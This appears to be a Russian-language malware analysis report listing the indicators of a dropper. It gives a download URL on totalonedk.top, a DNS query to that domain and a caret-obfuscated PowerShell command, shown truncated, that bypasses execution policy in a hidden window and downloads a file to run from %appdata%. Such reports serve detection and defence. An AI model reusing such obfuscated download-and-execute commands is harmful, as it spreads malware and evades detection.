Техническая информация
- http://totalonedk.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^w^eRS^hE^l^L.e^X^E -eXe^CUtioNpoLicY^ ^by^pAs^S^ -n^OPr^O^f^iLE ^-w^INdowSTyl^E^ H^iD^DEN (^neW-ObJECT SYstE^m.net.^W^ebc^L^i^EnT)^.D^o^W^n^L^OADfi^LE(^'http://totalonedk....
- DNS ASK to###onedk.top
- '<SYSTEM32>\cmd.exe' /C "Po^w^eRS^hE^l^L.e^X^E -eXe^CUtioNpoLicY^ ^by^pAs^S^ -n^OPr^O^f^iLE ^-w^INdowSTyl^E^ H^iD^DEN (^neW-ObJECT SYstE^m.net.^W^ebc^L^i^EnT)^.D^o^W^n^L^OADfi^LE(^'http://totalonedk....' (со скрытым окном)